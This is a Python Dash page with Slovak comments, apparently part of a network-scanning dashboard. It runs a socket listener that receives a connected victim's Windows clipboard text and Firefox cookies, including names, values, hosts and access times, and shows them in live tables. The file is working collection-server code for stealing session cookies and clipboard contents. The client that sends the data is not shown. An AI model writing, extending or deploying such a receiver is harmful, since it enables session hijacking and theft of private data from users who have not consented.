from dash import html, callback, dcc
import dash_bootstrap_components as dbc
from dash.dependencies import Input, Output
from dash import dash_table

from scapy.all import *  # Scapy
import socket

import pandas as pd  # Pandas

myMAC = get_if_hwaddr(conf.iface)  # moja MAC adresa
myIP = get_if_addr(conf.iface)  # moja IP adresa

my_clip_running = 0  # sken je / nie je spusteny
my_clip_progress = 0  # vizualne zobrazenie priebehu skenu
my_btn_clicks = 0  # pocet kliknuti pri poslednom stlaceni tlacidla


# trieda GetClipboardCookiesClass
class GetClipboardCookiesClass(Thread):
    def __init__(self):
        super().__init__()

        self.host = '192.168.1.60'  # server IP
        self.port = 65432  # server PORT

        self.stop_thread = Event()  # pre spravne ukoncenie vlakna

        # Clipboard data
        self.clip_data = pd.DataFrame(columns=['id', 'ClipID', 'IP', 'PORT', 'DATA'])
        self.clip_data.set_index("id", inplace=True)
        self.clip_id = 0  # id zaznamu

        # Cookies data
        self.cook_data = pd.DataFrame(columns=['id', 'CookID', 'IP', 'PORT', 'Nazov', 'Hodnota', 'Host',
                                               'Naposledy pouzite'])
        self.cook_data.set_index("id", inplace=True)
        self.cook_id = 0  # id zaznamu

        self.mysocket = None
        self.myconnection = None
        self.is_connected = 'cakam...'
        self.client_addr = None

    # spustenie skenovania v samostatnom vlakne
    def run(self):
        global my_clip_running

        # pocuvanie na zvolenom porte
        self.connection_open()

        # cakanie na nadviazanie spojenia so serverom
        while True:
            try:
                self.myconnection, self.client_addr = self.mysocket.accept()
                if self.myconnection:
                    data = self.myconnection.recv(1024)
                    self.is_connected = 'nadviazané, meno používateľa: ' + data.decode('utf-8')
                    break
            except Exception as e:
                print(e)

        # prijem obsahu Cookies a Clipboardu (iba text) od klienta
        while True:
            if self.stop_thread.is_set():  # ak Event is set, ukoncenie vlakna
                break
            # prijate data
            data = self.myconnection.recv(1024)
            if not data:
                print("Stop...")
                self.stop_thread.set()
                self.connection_close()
                my_clip_running = 2
                break
            # dekodovane data
            d = data.decode('utf-8')
            print('d:' + d)
            d = d.split('|xxx|')  # oddeluje prefix CLIP alebo COOK od samotnych dat
            ddata = d[1]

            # d[0] = CLIP alebo COOK
            # ddata = d[1] = samotne data
            if d[0] == 'CLIP':
                if ddata != '':
                    # test ci uz v zozname existuju rovnake data
                    exists = 0
                    for i in range(0, self.clip_id):
                        if self.clip_data.loc[i]['DATA'] == ddata:
                            exists = 1

                    # ak data neexistuju, doplni data do zoznamu
                    if exists != 1:
                        self.clip_data.loc[self.clip_id] = (self.clip_id, self.client_addr[0], self.client_addr[1],
                                                            ddata)
                        self.clip_id += 1  # bol pridany novy zaznam
            elif d[0] == 'COOK':
                if ddata != '':

                    ddata = ddata.split('|||')  # oddeluje jednotlive casti cookies
                    cook_name = ddata[0]
                    cook_value = ddata[1]
                    cook_host = ddata[2]
                    cook_lastaccessed = pd.to_datetime(int(ddata[3]), unit='us').strftime('%d.%m.%Y %H:%M:%S')

                    # test ci uz v zozname existuju rovnake data
                    exists = 0
                    for i in range(0, self.cook_id):
                        if self.cook_data.loc[i]['Nazov'] == cook_name:
                            exists = 1

                    # ak data neexistuju, doplni data do zoznamu
                    if exists != 1:
                        self.cook_data.loc[self.cook_id] = (self.cook_id, self.client_addr[0], self.client_addr[1],
                                                            cook_name, cook_value, cook_host, cook_lastaccessed)
                        self.cook_id += 1  # bol pridany novy zaznam

    # ukoncenie vlakna
    def join(self, timeout=None):
        self.stop_thread.set()
        self.connection_close()
        super().join(timeout)

    def get_host(self):
        return self.host

    def get_clip_data(self):
        return self.clip_data

    def get_clip_id(self):
        return self.clip_id

    def get_cook_data(self):
        return self.cook_data

    def get_cook_id(self):
        return self.cook_id

    # pocuvanie na zvolenom porte
    def connection_open(self):
        self.mysocket = socket.socket()
        self.mysocket.bind((self.host, self.port))
        self.mysocket.listen(1)

    def get_conn(self):
        return self.is_connected

    # ukoncenie pocuvania na zvolenom porte
    def connection_close(self):
        self.is_connected = 'ukoncene...'
        self.mysocket.close()


my_clipcook = GetClipboardCookiesClass()  # objekt triedy GetClipboardCookiesClass

# vzhlad stranky
layout = dbc.Container([
    dbc.Row([
        html.H1('Sken 5 - Sken obsahu Windows Clipboard a Firefox Cookies')
    ]),
    dbc.Row([
        html.Table(
            style={'marginBottom': '20px'},
            children=[
                html.Tr(
                    children=[
                        html.Td(
                            style={'text-align': 'center', 'border-bottom': 'none',
                                   'border-right': '1px solid', 'width': '33%'},
                            children=[html.Div('Moja MAC adresa je:'),
                                      html.Div(className='ADResa', children=[myMAC])]),
                        html.Td(
                            style={'text-align': 'center', 'border-bottom': 'none',
                                   'border-right': '1px solid', 'width': '33%'},
                            children=[html.Div('Moja IP adresa je:'),
                                      html.Div(className='ADResa', children=[myIP])]),
                        html.Td(
                            style={'text-align': 'center', 'border-bottom': 'none', 'width': '33%'},
                            children=[html.Div('Testuje sa sieť:'),
                                      html.Div(className='ADResa', children=[myIP + '/24'])])
                    ]
                )
            ]
        )
    ]),
    dbc.Row([
        html.Div(children=[html.Table(style={'marginBottom': '0px'},
                                      children=[
                                          html.Tr(children=[
                                              html.Td(style={'border-bottom': 'none'},
                                                      children=[html.Div('Spojenie: ')]),
                                              html.Td(style={'border-bottom': 'none'},
                                                      children=[html.Div(id='is_conn',
                                                                         className='ADResa',
                                                                         children=[my_clipcook.get_conn()])])
                                          ])
                                      ]),
                           html.Table(style={'marginBottom': '0px'},
                                      children=[
                                          html.Tr(children=[
                                              html.Td(style={'border-bottom': 'none'},
                                                      children=[html.Button(id='page5skenuj',
                                                                            n_clicks=0,
                                                                            children=['SKEN - START'],
                                                                            style={'margin-bottom': '10px',
                                                                                   'background-color': '#333333',
                                                                                   'color': '#ffffff'}
                                                                            )])
                                          ]
                                          )
                                      ]),
                           dcc.Input(id='page5pomocka', value='0', style={'display': 'none'}),
                           html.Div(children=[dbc.Progress(id='page5progbar', value=0, color='#1eaedb',
                                                           style={'height': '10px', 'margin-bottom': '10px'}),
                                              dcc.Interval(id='page5progbar-interval', n_intervals=0, interval=1000)])
                           ]),
        html.Div(children=[dash_table.DataTable(
            id='page5table1',
            fixed_rows={'headers': True, 'data': 0},
            columns=[{'id': 'ClipID', 'name': 'ID'},
                     {'id': 'IP', 'name': 'IP adresa'},
                     {'id': 'PORT', 'name': 'PORT'},
                     {'id': 'DATA', 'name': 'DATA'}],
            style_table={'border': 'grey solid', 'height': 300, 'margin-bottom': '10px'},
            style_header={'color': 'lightgrey',
                          'backgroundColor': 'rgb(30,30,30)',
                          'fontWeight': 'bold'},
            style_cell={'color': 'white',
                        'backgroundColor': 'rgb(50,50,50)',
                        'border': '0px solid',
                        'font-size': '1.2em',
                        'textAlign': 'center',
                        'min-width': '70px'},
            style_as_list_view=True,
            style_data_conditional=[{'if': {'row_index': 'odd'},
                                     'backgroundColor': 'rgb(70,70,70)'}],
            page_action='none'),
            dcc.Interval(
                id='page5table1_interval',
                interval=5000,  # aktualizuje n_intervals kazdych 5s
                n_intervals=0
            )
        ]),
        html.Div(children=[dash_table.DataTable(
            id='page5table2',
            fixed_rows={'headers': True, 'data': 0},
            columns=[{'id': 'CookID', 'name': 'ID'},
                     {'id': 'IP', 'name': 'IP adresa'},
                     {'id': 'PORT', 'name': 'PORT'},
                     {'id': 'Nazov', 'name': 'Nazov'},
                     {'id': 'Hodnota', 'name': 'Hodnota'},
                     {'id': 'Host', 'name': 'Host'},
                     {'id': 'Naposledy pouzite', 'name': 'Naposledy pouzite'}],
            style_table={'border': 'grey solid', 'height': 300, 'margin-bottom': '10px'},
            style_header={'color': 'lightgrey',
                          'backgroundColor': 'rgb(30,30,30)',
                          'fontWeight': 'bold'},
            style_cell={'color': 'white',
                        'backgroundColor': 'rgb(50,50,50)',
                        'border': '0px solid',
                        'font-size': '1.2em',
                        'textAlign': 'center',
                        'min-width': '70px'},
            style_as_list_view=True,
            style_data_conditional=[{'if': {'row_index': 'odd'},
                                     'backgroundColor': 'rgb(70,70,70)'}],
            page_action='none'),
            dcc.Interval(
                id='page5table2_interval',
                interval=5000,  # aktualizuje n_intervals kazdych 5s
                n_intervals=0
            )
        ])
    ])
])


# Callback funkcia pre tlacidlo - potrebna pre spravne zobrazovanie textu tlacidla pri vybere stranok
@callback(Output('page5skenuj', 'children'),
          [Input('page5pomocka', 'value')])
def update_page5skenuj(v):
    global my_clip_running

    btn_text = 'SKEN - END'
    if my_clip_running == 0:
        btn_text = 'SKEN - START'
    elif my_clip_running == 1:
        btn_text = 'SKEN - STOP'

    return btn_text


# Callback funkcia pre tlacidlo - "SKEN - START/STOP/END"
@callback(Output('page5pomocka', 'value'),
          Input('page5skenuj', 'n_clicks'),
          prevent_initial_call=True)
def update_page5pomocka(n_c):
    global my_clipcook
    global my_clip_running

    btn_text = '2'
    if my_clip_running == 0:
        print("Štart...")
        my_clipcook.start()  # spustenie skenovania v samostatnom vlakne
        my_clip_running = 1
        btn_text = '1'
    elif my_clip_running == 1:
        print("Stop...")
        my_clipcook.join(3)  # ukoncenie vlakna
        my_clip_running = 2
        btn_text = '2'

    return btn_text


# Callback funkcia pre tabulku 1 - aktualizacia kazdych 5s
@callback(Output('page5table1', 'data'),
          [Input('page5table1_interval', 'n_intervals')])
def update_page5table1(n):
    return my_clipcook.get_clip_data().to_dict('records')


# Callback funkcia pre tabulku 2 - aktualizacia kazdych 5s
@callback(Output('page5table2', 'data'),
          [Input('page5table2_interval', 'n_intervals')])
def update_page5table2(n):
    return my_clipcook.get_cook_data().to_dict('records')


# Callback funkcia pre progress bar - aktualizacia kazdu 1s
@callback([Output('page5progbar', 'value'),
          Output('is_conn', 'children')],
          [Input('page5progbar-interval', 'n_intervals')])
def update_page5progress(n):
    global my_clip_running
    global my_clip_progress

    if my_clip_running == 1:
        my_clip_progress += 25
        if my_clip_progress > 100:
            my_clip_progress = 0
    elif my_clip_running == 2:
        my_clip_progress = 0

    return [my_clip_progress, my_clipcook.get_conn()]
